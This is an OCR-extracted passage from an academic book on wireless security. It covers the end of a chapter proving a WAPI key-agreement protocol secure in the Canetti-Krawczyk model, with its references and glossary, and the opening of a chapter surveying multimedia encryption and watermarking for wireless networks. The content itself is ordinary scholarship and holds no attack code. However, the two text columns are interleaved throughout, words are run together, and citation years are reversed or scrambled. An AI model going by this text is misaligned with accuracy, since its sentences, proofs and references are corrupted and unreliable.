choose a random value (say r3) and forge a message advantage. This is because r in the k '' is selected
authentication code that AP can validate. Then B bytheattackerhimself,whichmakesthedifficulty
takes advantage of this ability to run the game that he/she distinguishes k '' from a random value
above. In Phase 1, he/she also chooses r3 as the no bigger than that he/she distinguishes k from a
random value r in the triple, while selects c and t random value. It is assumed that the advantage
randomly. Then, in Phase 2, he/she can work out that B distinguishes k"fromarandomvalue2is , 5
HMAC-SHA256k '' (t * )because this value is same as then ≥2 5 5 1. And because ka'' = last(KD-HMAC-
a ''
the forged message authentication code in the key SHA256( k '' ), B can get ka . Further, he/she can work
agreement acknowledgment. Therefore the attacker out HMAC-SHA256k '' (t * ) with a non-negligible
a
can distinguish HMAC-SHA256k '' (t * ) from s* and probability, which enables the attacker to win
a
guess correctly b in Phase 4, thus wins the game, the encryption game. That means the encryption
which indicates that the encryption scheme is not scheme is not secure against CCA2 attack. This
CCA2-secure. This contradicts with the presup- contradicts the presupposition. So the attacker B
position.Soduringtherunoftheprotocol can not,the get k with a non-negligible probability.
attacker cannot forge a key agreement acknowledg- Then this method is not practical.
ment with a non-negligible probability. As for the second method, there are two strate-
Therefore STA and AP will complete matching gies that the attacker can take. (1) After STA and
sessions and get a same session key at the end of AP complete the matching sessions, the attacker B
protocol,ifENCisCCA2-secure. # establishes a new session with AP or STA. But the
Lemma 2. If the encryption scheme ENC is session key of this session will not be kd, because
secure against the CCA2 attack, the attacker can- the encrypted random value is chosen randomly
not distinguish the session key kd from a random by AP or STA. (2) When AP and STA perform
value with a non-negligible advantage. the key agreement, B intervenes this negations
Proof. It is assumed that the attacker B can and makes them get a same session key without
distinguish the session key kd from a random the completion of the matching sessions. That is,
value with a non-negligible advantage 1 . In the STA and AP get a same session key but they do not
CK model, the KE-attacker is not permitted to complete matching sessions. Then the attacker can
corrupt the test session or its matching session, get the test session key by breaking the unmatching
so the attacker B cannot directly get the session session that has the same session key. But from
key kd from the attack of . While kd = first
(KD- Lemma 1, we know that if the encryption scheme
HMAC-SHA256(k)) (The first ( ) is a function that ENC is secure against the CCA2 attack, B cannot
extractsoutthefirstsixteenbytesfrom abit
succeed instring) ,
this intervention. So this method is not
so the attacker B has only two possible methods feasible either.
to distinguish kd from a random value. The firstLet us sum up the previous analysis. The attacker
one: B learns k. The second one: B succeeds in B neither can get the host key k, nor can he/she
forcing the establishment of a session (other than force to establish a new session with STA or AP
the test session or its matching session) that has that has the same session key as the test session.
the same key as the test session. In this case B can So the attacker cannot distinguish the session key
learn the test session key by simply querying the kd from the random value with a non-negligible
session with the same key, and without having to advantage. #
learn the value k. In the following, we prove that
neither of these two methods is feasible. Theorem 11. If the encryption scheme ENC
The first method means that, from the attack adopted is secure against CCA2 attack, then is
ofthe
, attackercandistinguish k"= r1 ⊕ r from SK-secure without PFS.
0
Proof. According to Lemma 1 and Lemma 2, plan can resist the UKS attack are that: (1) the
we know that STA and AP will get a same ses- implementation plan requires that the key agree-
sion key after the key agreement and the attacker ment request be sent from AP; (2) AP’s signature
cannot distinguish the session key from a random includes SPI which includes the destination entity’s
value with a non-negligible advantage. Then in address.
accordance with Definition 2, the protocol 2. Theis key-agreement protocol in the WAI of
SK-secure. the implementation plan can resist the KCI
In addition, if the private keys of STA and AP attack. KCI attacks for the protocol have two
are compromised, the attacker can get the random manners.ThefirstoneisthatAP’sprivatekeyis
values exchanged and can work out all the ses- compromised and the attacker can impersonate
sion keys that have been agreed about. Thus this STA to AP. The second one is that STA’s private
protocol cannot provide PFS. So we can get that key is compromised and the attacker can imperson-
the key-agreement protocol is SK-secure without ate AP to STA. In the following, we will discuss
PFS. # these two cases respectively.
If AP’s private key is compromised, the attacker
the Implementation Plan overcomes can decrypt ENC(PK AP, r2) to get r2. In order to
the weaknesses of the original wAPI get r1, he/she just has two possible methods: (1)
attacks the encryption algorithm ENC; and (2)
We know that WAI in the original WAPI has some impersonates other entity to establish another ses-
security weaknesses. But WAI in the implementa- sion with STA, and sends ENC(PKSTA,r1) to STA,
tion plan is secure in the CK model, and according then the attacker exposes this session and gets r1
to Li et al. (2005), we get that the WAI module of through some computations. But neither of these
the implementation plan can resist KCI attack and two methods isfeasible.Forthefirstmethod,we
UKS attack. In the following, we will analyze how know that if the encryption algorithm ENC is
the implementation plan overcomes the security CCA2 secure, the attacker cannot get r1 from the
weaknesses in the original WAPI. attack of this algorithm directly. As for the second
1. The key-agreement protocol in the imple- method, the implementation plan requires the key
mentation plan can resist UKS attack. In the agreement request be sent by AP, and the attacker
implementation plan, even though the attacker cannot forge AP’s signature, so the attacker can-
Bgetsacertificateinwhichhis/herpublic keyis other entity to establish another
not impersonate
the same as STA’s or AP’s, he/she cannot launch session with STA. Therefore the attacker cannot
the UKS attack. Because the implementation plan get r1. Then he/she still cannot get the host key k
requires that the key agreement request be sent and session key kd .
by AP, STA just accepts the request from AP. So, If STA’s private key is compromised, the at-
B can just launch the UKS attack against the AP tacker can decrypt ENC(PKSTA,r1) to get r1. In order
(i.e., AP thinks that he/she agrees upon a key with to get session key r2, he/she just has two possible
B, but in fact he/she negotiates a key with STA, methods: (1) attacks the encryption algorithm ENC
while STA correctly thinks that he/she negotiates directly to get r2; and (2) impersonates another
a key with AP), that is, B just can forward the mobile guest STA’ to establish a new session with
key agreement request message for him/her to AP and sends it ENC(PK AP, r2) in the key agreement
STA. But in this request, AP’s signature includes acknowledgement. From the previous analysis we
SPI which includes the MAC address of the B , so get that the first method is infeasible. As for th
STA will not accept this request forwarded from second method, because r2 and the host key k are
B. Therefore the key-agreement protocol in WAI of just the ephemeral values, we assume that they are
implementation plan can resist the UKS attack. not the session states of AP. Therefore, the session
From the previous analysis, we can see that the states of the new session in AP are just the session
*
essential reasons that WAI in the implementation key kd*, the message authentication key ka and the

message integration key. The attacker cannot get conclusIon

any information about r2 from these session states
because these three keys are the hash values of the In this chapter we focused on the provably secure
host key k * . Therefore the attacker cannot get r2 formal methods for the key-agreement protocols,
either. (If the session key is not the hash value of especially the CK model and universally compos-
k * , the attacker can get k * , futher can get r2.) So able security model. First, these two models are
the attacker still cannot get the host key k and the introduced; then we gave a study of these two
session key kd . models. An analysis of CK model presented its
As a whole, the essential reasons that the security analysis, advantages, and disadvantages,
key-agreement protocol can resist KCI attack are and a bridge between this formal method and the
that: (1) the implementation plan requires that the informal method (heuristic method) is established;
key agreement request be sent by AP; and (2) the an extension of UC security model gives a univer-
session key in the implementation plan is derived sally composable anonymous hash certification
through the hash function. model. Next, with the four-way handshake protocol
(3) The WAI module in the implementation in 802.11i and the Chinese WLAN security standard
plan realizes the mutual explicit identity au- WAPI, we give the application of these two models.
thentication between STA and AP, which can At last, the future trend of formal analysis method
withstand faulty charge. ForAP, is an explicit of key-agreement protocol was presented.
key authentication protocol. So AP can authenticate
the identity of STA at the end of WAI. At the same
time, STA can authenticate the identity of AP in rEfErEncEs
the certificate authentication. Therefore WAI in
the implementation plan realizes the mutual ex- Aboba, B., & Simon, D. (1999). PPP EAP TLS
plicit identity authentication between AP and STA. authentication protocol (RFC 2716). Retrieved
Therefore it can withstand faulty charge. from http://www.ietf.org/rfc/rfc2716.txt
Bellare, M., & Rogaway, P. (1993). Random
futurE trEnds Oracle are practical: A paradigm for designing
efficient protocols. In
Proceedings of the First
In the future, possible research “hot” points in for- ACM Conference on Computer and Communica-
mal analysis of key-agreement protocol include: (1) tions Security.
decrease in the basic assumptions of the protocol, Bellare, M., & Rogaway, P. (1995). Provably secure
such as the “perfect” cryptography assumptions, session key distribution: The three party case. In
free encryption assumptions; such that the theory Proceedings of the 27th ACM Symposium on the
research is closer to the practice; (2) extension Theory of Computing—STOC5 9 1 (pp. 57-66).
of the protocol analysis scope; (3) enhancement ACM Press.
of the analysis capability of “protocol composi-
tion,” which is the “hot” and difficult point; Bellare, M.,
)4 ( Canetti, R., & Krawczyk, H. (1998).
integration of the characters of different analysis A modular approach to the design and analysis
methods, such as the comparison and combination of authentication and key-exchange protocols. In
of CSP model, string space model, model check Proceedings of the 30th Symposium on the Theory
method, and linear logic methods; (5) the research ofComputing,STOC89 1 (pp. 419-428).
in automatic generation and check of security Birgit, P., & Michael, W. (2001, May). A model for
protocol; (6) the research in the case that the party asynchronous reactive systems and its application
number is indefinitely increased; 7)( solution to secure to message transmission. In Proceedings
“state exploration” problem in the model check of the IEEE Symposium on Security and Privacy,
methods; and (8) the research in new areas, such Oakland, CA (pp. 184-200).
as the DoS attack.

Blake-Wilson, S., Johnson, D., & Menezes, A. Choo, K. K. R, & Hitchcock, Y. (2005). Security
(1997). Key agreement protocols and their se- requirement for key establishment proof models:
curity analysis. In Proceedings of the sixth IMA Revisiting Bellare-Rogaway and Jeong-Katz-Lee
international Conference on Cryptography and protocols. In Proceedings of the 10th Australasian
Coding. Conference on Information Security and Pri-
vacy—ACISP.
Borisov, N., Goldberg, I., & Wagner, D. (2001).
Intercepting mobile communications: The inse- Diffie,W.Hellman,
&, M.New
. 6) 7 9 1 ( directions
curity of 802.11. In Proceedings of the 7th Annual in cryptography. IEEE Transactions on Information
International Conference on Mobile Computing Theory, 22, 644-654.
and Networking, Italy.
Diffie,W.Van
, Oorschot,P.Wiener,
&, M..) 29 1 (
Brown, D. R. L. (2001). The exact security of Authentication and authenticated key exchanges.
ECDSA (IEEE 1363). Designs, Codes and Cryptography, 2, 107-125.
Burrows, M., Abadi, M., & Needham, R. M. (1990). Fan, Z., JianFeng, M., & Moon, S. (2007). A
A logic of authentication. ACM Transactions on universally composable anonymous- hash certifi
Computer Systems, 8(1), 122-133. cation model. Science in China (F serial)(3), 05
440-445.
Burton, S., & Kaliski, J. R. (2001). An unknown
key-share attack on the MQV key agreement Güther, C. G. (1990). An identity-based key-ex-
protocol. ACM transactions on Information and change protocol. In Advances in Cryptology-EU-
System Security, 4(3), 275-288. ROCRYPT’89 (LNCS 434, pp. 29-37). Springer-
Verlag.
Canetti, R. (2001). Universally composable secu-
rity: A new paradigm for cryptographic protocols. IEEE 802.1X-2001. (2001). IEEE standard for lo-
In Proceedings of the 42th IEEE Annual Sympo- cal and metropolitan area networks—Port-based
sium on Foundations of Computer Science (pp. network access control.
136-145).
IEEE P802.11i D3.0. (2002). Specification for
Canetti, R. (2004). Universally composable signa- enhanced security.
ture,certification,andauthentication. Proceed- In
Krawczyk, H. (1996, February). SKEME: A
ings of 17th IEEE computer security foundations
versatile secure key exchange mechanism for In-
workshop (CSFW) (pp. 219-245). IEEE Computer
ternet. In ProceedingoftheInternet 69 1 Society
Society Press.
Symposium on Network and Distributed System
Canetti, R., & Krawczyk, H. (2001). Analysis of Security (pp. 114-127).
key exchange protocols and their use for building
Krawczyk,H.HMQV:
. )502 ( Ahigh-performance
securechannels.InB.Pfitzmann (Ed.,)
Advances
secure Diffie-Hellman protocol. In in
Advances
in cryptology—EUROCRYPT 2001 (LNCS 2045,
Cryptology–CRYPTO : 502th Annual Inter-
pp. 453-474) Berlin, Germany: Springer-Verlag.
national Cryptology Conference (LNCS 3621, pp.
Canetti, R., & Krawczyk, H. (2002). Universally 546-566). Springer-Verlag.
composable notions of key exchange and secure
Law, L., Menezes, A., Qu, M., Solinas, J., &
channels. In Proceedings of Eurocrypt 2002.
Vanstone, S. .) 89 1 ( An efficient protocol for
Changhua, H., & Mitchell, C. J. (2004, October 1). authenticated key agreement (Tech. Rep. CORR
Analysis of the 802.11i 4-way handshake. In Pro- 98-05). Ontario, Canada: University of Waterloo,
ceedings of ACM Workshop on Wireless Security, Department of Combinatorics & Optimization.
WiSe’04, Philadelphia, PA.

Li, X., Ma, J., & Moon, S. (2005). On the security Rigney, C., Willens, S., Rubens, A., & Simpson,
of Canetti-Krawczyk model. (LNAI 3802, pp. 356- W. (2000). Remote authentication dial in user
363). Springer-Verlag. service (RADIUS) (RFC 2865). Retrieved from
http://www.ietf.org/rfc/rfc2865.txt
Martin, A., & Phillip, R. (2002). Reconciling two
views of cryptography. Journal of Cryptology, Shoup, V. (1999). On formal models for se-
5 1 (2), 103-127. cure key exchange. Theory of Cryptography
Library. Retrieved from http://citeseer.ist.psu.
Meadows,C.Formal
. )6 9 1 ( verificationofcrypto -
edu/cache/papers/cs2/769/http:zSzzSzeprint.iacr.
graphic protocols: A survey. In Proceedings of the
orgzSz1999zSz012.pdf/shoup99formal.pdf
AdvancesinCryptology,Asiacrypt’9 6
(LNCS1163,
pp. 135-150). Springer-Verlag. Tin, Y. S. T., Boyd, C., & Nieto, J. G. (2003).
Provably secure key exchange: An engineering
Menezes, A., Van Oorschot, P., & Vanstone, S.
approach. In Australasian Information Security
(1996). Handbook of applied cryptography. In
Workshop 2003(AISW 2003) (pp. 97-104).
chapter 12. CRC Press.
Wenbo, M. (2004). Modern cryptography: Theory
Michael, B., & Dennis, H. (2004). How to break
and practice. Prentice-Hall, PTR.
and repair a universally composable signature func-
tionality. In Information security conference—ISC Yehuda, L. (2003). Composition of secure multi-
2004 (LNCS 3225, pp. 61-74). party protocols—A comprehensive study (LNCS,
2815). Springer-Verlag.
Mitchell C. J., Ward M., & Wilson, P. (1998). Key
control in key agreement protocols. Electronics
Letters, 34, 980-981.
National Standard of the People’s Republic of
kEy tErMs
China. (2003). Information technology—Telecom-
Acknowledgment (ACK) property: Let F an
munications and information exchange between
idealfunctionalityandlet beanSK-secureKE
systems—Local and metropolitan area networks—
protocol in the F -hybrid model. An algorithm I is
Specific requirements—Part : 1 Wireless LAN
said to be an internal state simulator for if for
medium access control (MAC) and physical layer
any environment machine Z and any adversary A
(PHY)specificationsGB ( . ) 30 2 - 1 . 9 2 6 5 1
we have HYB F , A,Z ≈HYB F ,A,Z,I
National Standard of the People’s Republic of
ProtocolissaidtohavetheACKpropertyif
China. (2004). Guide for GB 15629.11-2003 In-
thereexistsagoodinternalstatesimulatorf
formation technology—Telecommunications and
information exchange between systems—Lo- Composition Theorem: The key advantage of
cal and metropolitan area networks—Specific UC security is that we can create a complex protocol
requirements—Part 11: Wireless LAN medium from already designed sub-protocols that securely
access control (MAC) and physical layer (PHY) achieves the given local tasks. This is very impor-
specifications.and GB20-31 . 9265 1 Infor - tant since complex systems are usually divided
mation technology—Telecommunications and into several sub-systems, each one performing a
information exchange between systems—Local specifictasksecurely.Canettipresentedthisfea
andmetropolitanareanetworks—Specific - as therequire
composition theorem (Canetti, 2001). This
ments—Part 11: Wireless LAN medium access theorem assures that we can generally construct
control(MAC)andphysicallayer(PHY)specifi - a large size “UC-secure” cryptographic protocol
cations: Higher-speed physical layer extension in by using sub-protocols which is proven as secure
the 2.4 GHz band. in UC-secure manner.

Explicit Key Authentication: Explicit key Session-Key Security: A KE protocol is

authentication is the property obtained when both called Session-key secure (or SK-secure) if the
implicit)
( keyauthenticationandkeyconfirmation following properties hold for any KE-adversary
hold. M:
(Implicit) Key Authentication: (Implicit) key 1. Protocol satisfiesthepropertythatiftwo
authentication is the property whereby one party is uncorrupted parties complete matching sessions
assuredthatnootherpartyasidefrom aspecifically
then theybothoutputthesamekey;and
identified second party and ( possibly additional
2. The probability that M distinguishes the
identified trusted parties) may gain access to a
session key from a random value is no more than
particular secret key.
1/2 plus a negligible fraction M in the security
Key-Agreement Protocol: A key-agreement parameter. M is called “advantage”.
protocol or mechanism is a key establishment
Universally Composable (UC) Security: In
technique in which a shared secret is derived by
UC framework, real protocol securely realizes
two (or more) parties as a function of information
ideal functionality if F, for ∀ A and ∀ Z, it has
contributed by, or associated with, each of these,
the same “action” as F,. Formally, a protocol
(ideally) such that no party can predetermine the
securely realizes an ideal functionality F is for any
resulting value.
real-life adversary A there exists an ideal-process
Key Confirmation: Key confirmation is the adversary S such that, for any environment Z and
property whereby one party is assured that a on any input, the probability that Z outputs “1”
second(possiblyunidentified)partyactually has witha A andpartiesrunningin
after interacting
possession of a particular secret key. the real-life model differs by at most a negligible
fraction from the probability that Z outputs “1” after
interacting with S and F in the ideal process.

Chapter XVI
Multimedia Encryption and
Watermarking in
Wireless Environment
Shiguo Lian
France Telecom R&D Beijing, China
AbstrAct
Inawirelessenvironment,multimediatransmissionisoftenaffectedbytheerrorrate;d
powerorbandwidth;andsoforth,whichbringsdifficultiestomultimediacontentprotec
decade, wireless multimedia protection technologies have been attracting more and more researchers.
Among them, wireless multimedia encryption and watermarking are two typical topics. Wireless multi-
mediaencryptionprotectsmultimediacontent’sconfidentialityinwirelessnetwor
on improving the encryption efficiency and channel friendliness. Some means have been p
suchastheformat-independentencryptionalgorithmsthataretimeefficientcompare
ciphers; the partial encryption algorithms that reduce the encrypted data volume
information unchanged; the hardware-implemented algorithms that are more efficient
based ones; the scalable encryption algorithms that are compliant with bandwidth c
robust encryption algorithms that are compliant with error channels. Compared with wireless multimedia
encryption, wireless multimedia watermarking is widely used in ownership protection, traitor tracing,
content authentication, and so forth. To keep low cost, a mobile agent is used to partitioning some of
the watermarking tasks. To counter transmission errors, some channel encoding methods are proposed
to encode the watermark. To keep robust, some means are proposed to embed a watermark into media
data of low bit rate. Based on both watermarking and encryption algorithms, some applications arise,
such as secure multimedia sharing or secure multimedia distribution. In this chapter, the existing wireless
multimedia encryption and watermarking algorithms are summarized according to the functionality and
multimediatype;theirperformancesareanalyzedandcompared;therelatedapplication
and some open issues are proposed.
IntroductIon Firstly, the bandwidth is still limited compared with

wired channels. Secondly, there are many more
With the development of multimedia technology transmission errors in wireless communication,
and network technology, multimedia data are used such as channel error, loss, delay, jitter, and so forth,
more and more widely in human’s daily life, such which are caused by path error, fading, noise or in-
as mp3 sharing, video conference, video telephone, terference, and so forth. Thirdly, wireless or mobile
video broadcasting, video-on-demand, p2p stream- terminals are often of limited memory. Fourthly,
ing, and so forth. For multimedia data may be in the terminals are often energy-constraint caused
relation with privacy, profit, or copyright, - by themulti
scale-limited battery. These properties push
media content protection becomes necessary and some requirements to multimedia encryption and
urgent. It permits that only the authorized users watermarking algorithms.
could access and read the multimedia data, it can To meet mobile/wireless multimedia content
detectthemodificationofthemultimedia data,
protection, someitmobile digital rights management
can prove the ownership of the multimedia data, (DRM) systems (Kundur, Yu, & Lin, 2004) have
it can even trace the illegal distribution of the been proposed, such as Nokia’s Music Player, NEC
multimedia data, and so forth. VS-7810, Open Mobile Alliance (OMA), and so
During the past decades, some means have forth. In these systems, multimedia encryption and
been proposed to protect multimedia data. Among multimedia watermarking are two core technolo-
them, multimedia encryption (Furht & Kirovski, gies. Compared with wired environment, wireless
2006) and multimedia watermarking (Cox, Miller, multimedia encryption and watermarking should
& Bloom, 2002) are two typical ones. Multimedia consider some extra requirements. For example,
encryption algorithms protect multimedia data’s the algorithms should be lightweight in order to
confidentialitybyencodingortransforming - meet themulconstraint energy of the terminals. Ad-
timedia data into unintelligible forms under the ditionally, the algorithms should be robust against
control of the key. Thus, only the authorized users transmission errors in some extent. Furthermore,
who have the correct key can recover the multime- the algorithms should be scalable to switch between
dia data successfully. Till now, some multimedia wireless services and wired services.
encryption algorithms have been proposed, which During the past decade, some means have been
focus on the security, time efficiency, - and com to make suitable wireless multimedia
proposed
munication friendliness (Zeng, Zhuang, & Lan, encryption and watermarking algorithms. These
2004). Multimedia watermarking algorithms algorithms obtain the security, efficiency, and
protect multimedia data’s ownership by embed- error robustness by considering the properties of
ding ownership information into multimedia data wireless/mobile multimedia communication. In
under the control of the key. Thus, the authorized thischapter,theyareclassifiedintoseveralty
users can extract or detect the ownership infor- according to the functionalities, and their perfor-
mation and authenticate it. Many watermarking mances are analyzed and compared. Additionally,
algorithms (Barni & Bartolini, 2004) have been some open issues are presented.
proposed during the last decade, which consider The rest of the chapter is arranged as follows.
security, imperceptibility, robustness and capacity, In the next section, the requirements of wireless/
and so forth. mobile multimedia encryption and watermarking
Recently, mobile/wireless multimedia commu- are presented respectively. The multimedia encryp-
nication has become more and more popular, which tion algorithms are analyzed and compared in the
benefits from the improvement of the capability third section, and the watermarking algorithms are
of mobile terminals and the bandwidth of wireless analyzed and compared in the fourth section. In
channel. Compared with wired communication, thefifthsection,someresearchtopics - andapplica
wireless multimedia communication has some tions based on the combination of watermarking
special properties (Salkintzis & Passas, 2005). and encryption are presented, followed by some

open issues in the sixth section. Finally, in the last beadoptedtoimprovetimeefficiency,thatis,the

section, some conclusions are drawn. firstoneistoreducetheencrypteddatavolumes
and the second one is to adopt fast encryption
algorithms. Additionally, to adapt the energy-con-
gEnErAl rEquIrEMEnts of straint devices, such as mobile terminals, handset,
MultIMEdIA contEnt handheld, and so forth, the lightweight encryption
ProtEctIon algorithms are preferred to decrease the energy-
consumption.
Compression ratio. Multimedia data are often
requirements of Multimedia
compressed in order to reduce the storage space
Encryption
or transmission bandwidth. In this case, multime-
dia encryption algorithms should not change the
Multimedia data are often of high redundancy,
compression ratio.
large volumes, real time operations, and the com-
Format compliance. In multimedia data, the
pressed data are of certain format. These proper-
format information, such as file header, frame
ties require that wireless multimedia encryption
header, file tail, and so forth will be used by the
algorithms should satisfy some requirements (Furht
decoder to realize synchronization. Encrypting
& Kirovski, 2006), such as content security, time
multimedia data except the format information
efficiency,formatcompliance,andsoforth.Allof
will keep the encrypted data stream format-com-
them are presented in detail as follows.
pliant. Thus, the encrypted data can be previewed
Security. In multimedia encryption, the secu-
directly. Additionally, the format information can
rity refers to content security. It is composed of
be used to resynchronize the transmission process
two aspects, that is, cryptographic security and
in error environment.
perceptual security. The former one refers to the
Communication compliance. In wireless or
security against such cryptographic attacks as
mobile environment, transmission errors often
brute-force attack, ciphertext-only attack, known-
happened, such as, channel error, loss, delay, or
plaintext attack, and so forth. The latter one refers
jitter. The good multimedia encryption algorithms
to the intelligibility of the encrypted multimedia
should not cause error propagation. Thus, the
content. Generally, for multimedia encryption, an
error conditions will also be considered when
encryption algorithm is regarded as secure if the
designing a wireless/mobile multimedia encryp-
cost for breaking it is no smaller than the one paid
tion algorithm.
for the multimedia content’s authorization. For
Direct operation. If the encrypted multimedia
example, in broadcasting, the news may be of no
data can be operated directly, the decryption-op-
value after an hour. Thus, if the attacker can not
eration-encryption triples can be avoided, and the
break the encryption algorithm during an hour, then
efficiencycanalsobeimproved.Atypicalexample
the encryption algorithm may be regarded as secure
is to support direct bit rate conversion, that is, the
in this application. Thus, according to this case,
encrypted data stream can be cut off directly in
encryptingonlysignificantpartsofmultimediadata
order to adapt the channel bandwidth. This property
may be reasonable if the cryptographic security
brings convenience to the applications in wireless
andperceptualsecurityarebothconfirmed,which
or mobile environment.
will decrease the encrypted data volumes.
Efficiency. Theefficiencyreferstoboth - timeef
ficiencyandenergy-consumptionefficiency.Since
requirements of Multimedia
real-time transmission or access is often required watermarking
by multimedia-related applications, multimedia
encryptionalgorithmsshouldbetime For multimedia
efficient sowatermarking algorithms, some
that they do not delay the transmission or access performances are required, such as security, ro-
operations. Generally, two kinds of method can bustness, transparency, oblivious, vindicability,

and efficiency Cox ( et al.,.) 02Here, only the original copy. It is also named blind detection. On
ones related to wireless/mobile environment are the contrary, non-blind detection means that the
emphasized. original copy is required by the detection process. In
Security. Similar to an encryption algorithm, practical applications, especially in wireless/mobile
the construction of a watermarking algorithm environment, memory is limited, and thus blind
should consider the security against various at- or oblivious detection is preferred.
tacks (Kutter, Volosphynovskiy, & Herrigel, 2000;
Linnartz & Dijk, 1998; Petitcolas, Anderson, &
Kuhn, 1999). According to the attacker’s ability, tHE EncryPtIon AlgorItHMs
the attacks can be classified into several for wIrElEss types: MultIMEdIA
attack under the condition of knowing nothing
about the watermarking system, attack knowing Some encryption algorithms have been proposed
some watermarked copies, attack knowing the with respect to image, audio, speech, or video in
embedding algorithm, and the attack knowing wireless environment. These algorithms adopt
the watermark detector. Generally, some encryp- some means to meet wireless communication
tion operations are introduced to watermarking requirements. According to the functionality,
algorithms in order to keep secure. theencryptionalgorithmsareclassifiedintofo
Imperceptibility. Imperceptibility means that types: (1) format independent encryption, (2)
the watermarked media data have no difference format compliant encryption, (3) communication
with the original ones in perception. It is also compliant encryption, and (4) direct-operation
named transparency or fidelity. This makes sure encryption. The first type supports
supported
that the watermarked copy is still of high quality the media data of arbitrary format, the second
and suitable for practical applications. one combines the encryption operation with the
Robustness. Multimedia data are often pro- compression process, the third one considers the
cessed during transmission process, and some of transmission errors, and the fourth one supports
the processing operations are acceptable. Thus, some direct operations on the encrypted multimedia
the watermark should still be detected after these data. In the following content, they are introduced
operations. Generally, the robustness refers to the and analyzed in detail.
ability for the watermark to survive such opera-
tions including general signal processing opera- format Independent Encryption
tions filtering,
( noising, A/D, D/A, re-sampling,
recompression, etc.) and geometric attacks (rota- Format independent encryption algorithms regard
tion, scaling, shifting, transformation, etc.). For multimedia data as binary data and encrypt multi-
wireless/mobile multimedia, transmission errors mediadatawithoutconsideringofthefileformat
should also be considered, such as loss, delay, jit- Traditional ciphers (Mollin, 2006), such as DES,
ter, and so forth. IDEA, AES, RSA, and so forth, encrypt text or
Efficiency. Efficiency refers to both time - ef
binary datadirectlywithoutconsideringofthefi
ficiencyandenergy-consumptionefficiency. The
format. These ciphers have been included in the
watermarkingalgorithmwithhightime efficiency
protocols, IP security (IPsec) and secure socket
is more suitable for real time applications, such layer (SSL), and the package CryptoAPI, and these
as video-on-demand, broadcasting, per-per-view, protocols are also included in a multilayer security
and so forth. For some energy-limited devices, the framework (Dutta, Das, Li, & Auley, 2004). The
lightweight watermarking algorithm is preferred, energy requirements of most of the encryption
which costs less power and is more efficient algorithmsin are analyzed in Potlapally, Raghuna-
implementation. than, and Jha (2003), some of which are suitable
Oblivious detection. Oblivious detection for wireless applications. However, for wireless
means that the detection process needs not the multimedia, some means should be made to im-

provetheefficiency.Onesolutionistoimplement such as WEP, IWEP, RC2, RC4, RC5, and so forth.

the algorithms in hardware, and another one is to Experiments are done in Ganz, Park, and Ganz
design lightweight algorithms. to ) 89 1 ( testthesoftwareefficiencyofRC2RC4 , ,
Hardware implementation. To improve the and RSA. It is shown that software implementa-
encryptionalgorithms’efficiency,hardware - tion ofimple
these ciphers can meet the requirements of
mentation is a suitable solution. The security pro- such wireless applications as multimedia e-mail,
cessing architectures are proposed in Raghunathan, multimedia notes, telephone-quality audio, video
Ravi, Hattangady, and Quisquater,)which 30 2 ( conferencing or MPEG video interaction, and so
include an embedded processor, a cryptographic forth. The disadvantage is that their performance
hardware accelerator, and a programmable security islimitedbythecomputersystemconfiguration.
protocol engine. For the core encryption algorithms, Besides the experiments, some design guidelines
some experiments are done to show their suit- (Ganz, Park, & Ganz, 1999) are proposed for
ability. For example, hardware implementation of real-time software encryption, which considers
triple data encryption standard (3DES) is proposed the WLAN throughput, quality of serviceQoS) (
in Hamalainen, Hannikainen, Hamalainen, and requirements, encryption throughput determined
Saarinen (2001). The experiments show that 3DES bycomputerconfiguration,andadditional - process
implementations with small area and reasonable ing overhead incurred by other protocol layers.
throughput can be realized even though 3DES turns Generally, the algorithms with higher security
out to be quite large and resource-demanding. It are often of higher computing complexity. In tra-
is suitable for some applications in wireless LAN ditional applications, an encryption algorithm is
(WLAN). Compared with such block cipher as evaluated in a one-or-nothing manner, for example,
3DES, stream ciphers have some good properties, secure or insecure (Ong, Nahrstedt, & Yuan, 2003).
such as immunity to error propagation, increased In pervasive environments, it is insufficient, - be
exibility,
fl and greater efficiency. The Linear cause the limited computing resources may limit the
Feedback Shift Register (LFSR)-based stream security requirement. Thus, a quality of protection
ciphers are implemented in hardware (Goodman QoP)
( frameworkOng ( etal.)isproposed,which
& Chandrakasan, 1998), which are shown ideally evaluates an encryption algorithm in an adaptive
suited to low power wireless communications as manner. That is, the security level can be tuned in
they can be constructed from very simple and order to meet some other performances suitable
power- efficient hardware. Additionally, some
for wireless/mobile applications. For example, the
wireless suitable stream ciphers, for example, QoP metadata may be <content type, interval of
wired equivalent privacy (WEP), improved wired security, encryption algorithm, encryption key
equivalent privacy (IWEP), and Ron’s cipher #4 length, encryption block size>. By tuning these
(RC4) are implemented in hardware and tested in parameters in the metadata, the suitable perfor-
WLAN (Tikkanen, Hannikainen, Hamalainen, mances can be obtained. This framework has the
& Saarinen, 2000). Among them, IWEP is more following properties: (1) it can tune the quality of
suitable for hardware and of lower cost than protection, (2) it gets a balance between security
RC4 although it is of lower security than RC4. andperformancerequirement,andit ) 3 ( isexible
fl
Generally, hardware implementation improves and upgradable to support latest cryptographic
thecomputingefficiency,butitalsobrings some
standards. However, before using this scheme, some
problems, for example, the high cost to upgrade problems should be solved, for example, how and
the algorithms. where to store or transmit the metadata.
Lightweight encryption algorithms. Com-
pared with hardware implementation, software format compliant Encryption
implementation is cheaper and more exible fl for
upgrades. For wireless applications, some light- For multimedia data, partial encryption (Furht
weight encryption algorithms have been proposed, & Kirovski, 2006) can be used to reduce the en-
0
Figure 1. An example of partial encryption method
Data part
Encrypt
0
Data Data part Data Encrypted

Media data
partition 1 combination media data
... ...
Data part
N-1
crypteddatavolumes,whichkeepsthefile format
proposed to encrypt telephone-bandwidth speech.
unchanged. Additionally, the left format informa- This algorithm partitions the code stream into
tion can be used to synchronize the transmission two classes, for example, the most perceptually
process, especially in wireless/mobile environment relevant one, and the other one. Among them, the
where transmission errors often happen. The core former one is encrypted while the other one is left.
ofpartialencryptionisencrypting - only
It the signifi
is reported that encrypting about 45% of the
cant parameters in multimedia data while leaving bitstream achieves content protection equivalent
other ones unchanged. Figure 1 gives an example to full encryption. In another method (Sridharan,
for partial encryption, in which, media data are Dawson, & Goldburg, 1991), speech data are en-
partitionedintoNdataparts,onlythe first
crypted bydata part
encrypting only the parameters of Fast
is encrypted, while other parts are left unencrypted. Fourier Transformation during speech encoding,
The data part may be a block or region of the im- and the correct parameters are used to recover the
age, a frame of the video sequence, a bit-plane of encrypted data in decryption. For MP3 (Gang,
the image pixels, a parameter of the compression Akansu, Ramkumar, & Xie, 2001; Servetti, Testa,
codec, a segment of the compressed data stream, Carlos, & Martin, 2003) music, only the sensitive
